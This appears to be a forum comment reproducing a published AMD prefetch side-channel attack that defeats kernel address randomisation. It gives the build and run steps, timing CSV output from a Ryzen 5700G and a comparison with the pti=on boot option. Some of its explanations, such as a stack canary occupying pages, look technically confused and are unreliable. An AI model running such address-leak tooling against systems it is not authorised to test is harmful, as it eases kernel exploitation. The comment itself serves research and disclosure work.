|
these are the tests you need to run: https://github.com/amdprefetch/amd-prefetch-attacks/blob/mas... you probably want to do `export WITH_TLB_EVICT=1` before you make, then run ./kaslr. The power stuff is patched (by removing the RAPL power interface) but there is still timing differences visible on my 5700G and the WITH_TLB_EVICT makes this fairly obvious/consistent: https://pastebin.com/1n0QbHTH ```csv 452,0xffffffffb8000000,92,82,220 453,0xffffffffb8200000,94,82,835 454,0xffffffffb8400000,110,94,487 455,0xffffffffb8600000,83,75,114 456,0xffffffffb8800000,83,75,131 457,0xffffffffb8a00000,109,92,484 458,0xffffffffb8c00000,92,82,172 459,0xffffffffb8e00000,110,94,499 460,0xffffffffb9000000,92,82,155 ``` those timing differences are the presence/nonpresence of kernel pages in the TLB, those are the KASLR pages, they’re slower when the TLB eviction happens because of the extra bookkeeping. then we have the stack protector canary on the last couple pages of course: ```csv 512,0xffffffffbf800000,91,82,155 513,0xffffffffbfa00000,92,82,147 514,0xffffffffbfc00000,92,82,151 515,0xffffffffbfe00000,91,82,137 516,0xffffffffc0000000,112,94,598 517,0xffffffffc0200000,110,94,544 518,0xffffffffc0400000,110,94,260 519,0xffffffffc0600000,110,94,638 ``` edit: the 4 pages at the end of the memory space are very consistent between tests and across reboots, and the higher lookup time goes away if you set the kernel boot option "pti=on" manually at startup, that’s the insecure behavior as described in the paper. log with pti=on kernel option: https://pastebin.com/GK5KfsYd ```csv 513,0xffffffffbfa00000,92,82,147 514,0xffffffffbfc00000,92,82,123 515,0xffffffffbfe00000,92,82,141 516,0xffffffffc0000000,91,82,134 517,0xffffffffc0200000,91,82,140 518,0xffffffffc0400000,91,82,151 519,0xffffffffc0600000,91,82,141 ``` environment: ubuntu 22.04.4 live-usb, 5700G, b550i aorus pro ax latest bios |